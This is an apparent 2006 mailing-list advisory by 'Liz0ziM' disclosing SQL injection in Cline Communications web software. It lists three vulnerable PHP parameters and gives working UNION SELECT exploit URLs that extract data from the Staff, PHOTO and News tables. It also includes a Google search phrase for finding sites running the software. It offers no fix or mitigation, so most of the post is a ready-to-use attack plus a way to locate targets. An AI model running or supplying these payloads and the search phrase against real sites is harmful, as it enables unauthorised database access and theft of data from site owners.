Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

XSS in GardenWeb

[ECHO_ADV_33$2006] CMS Faethon 1.3.2 mainpath Remote File Inclusion

Simple PHP Poll Authecnication Admin ByPass

file include exploits in dotwidgeta Version 2

From:	:) :) <liz0_(at)_bsdmail.com>
Date:	18.06.2006
Subject:	Cline Communications Sql injection

Cline Communications Sql injection
-------------------------------------
Site:http://www.celerondude.com/
Demo:http://www.liveelite.com/
---------------------------------
Sql injection
1,photo_enlarged.php file Photo_ID parameter  
2,newsdetail.php file NID parameter
3,staff_photo_enlarged.php file Staff_ID parameter




http://website/photo_enlarged.php?Photo_ID='sql

http://website/newsdetail.php?NID='sql

http://website/staff_photo_enlarged.php?Staff_ID='sql


Example:

http://localhost/staff_photo_enlarged.php?Staff_ID=-1+union+select+1,2,3,4,5,
6+from+Staff
http://localhost/photo_enlarged.php?Photo_ID=-1+union+select+1,2,3,4,5,6,7,8,9,
1+from+PHOTO
http://localhost/newsdetail.php?NID=-1+union+select+1,2,3,4,5+from+News
http://localhost/newsdetail.php?NID=-1+union+select+News_date,news_id,3,
news_date,5+from+News



-----------------------------------------
Credit:Liz0ziM
E-mail:liz0@bsdmail.com
Site:www.biyo.tk www.biyosecurity.be

Greeatz:My All Friend

-----------------------------------------
Google:

"This site powered by Cline Communications"
-----------------------------------------
Source:
http://www.blogcu.com/Liz0ziM/714903/
http://liz0zim.no-ip.org/cline.txt
http://biyosecurity.be/bugs/cline.txt